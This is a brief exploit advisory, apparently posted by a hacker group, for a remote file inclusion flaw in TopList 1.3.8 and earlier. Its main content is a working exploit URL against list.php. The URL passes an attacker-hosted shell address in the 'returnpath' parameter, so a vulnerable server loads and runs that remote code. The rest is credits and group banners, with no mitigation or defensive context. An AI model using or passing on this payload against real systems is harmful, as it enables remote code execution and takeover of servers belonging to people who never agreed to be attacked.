TopList versions 1.3.8 and below are susceptible to a remote file inclusion flaw.
7569c6728074698bda67ceb0ef021cf979e4489d5179a2a719d6da944900668c
####################################################
# IHST - MFox > MFoxHacker@gmail.com #
####################################################
- Vendor = TopList (PHPBB)
- Target = list.php
- Exploit :
http://[target]/top/list.php?returnpath=[shell_url]
Bug Discovered by MFox
Special thanks to all of my friendZ
##################################################
# IHST - Iran HackerZ Security Team #
# irc.governmentsecurity.org #h4ckerz.com #
# Www.Hackerz.Com - Www.Hackerz.iR #
##################################################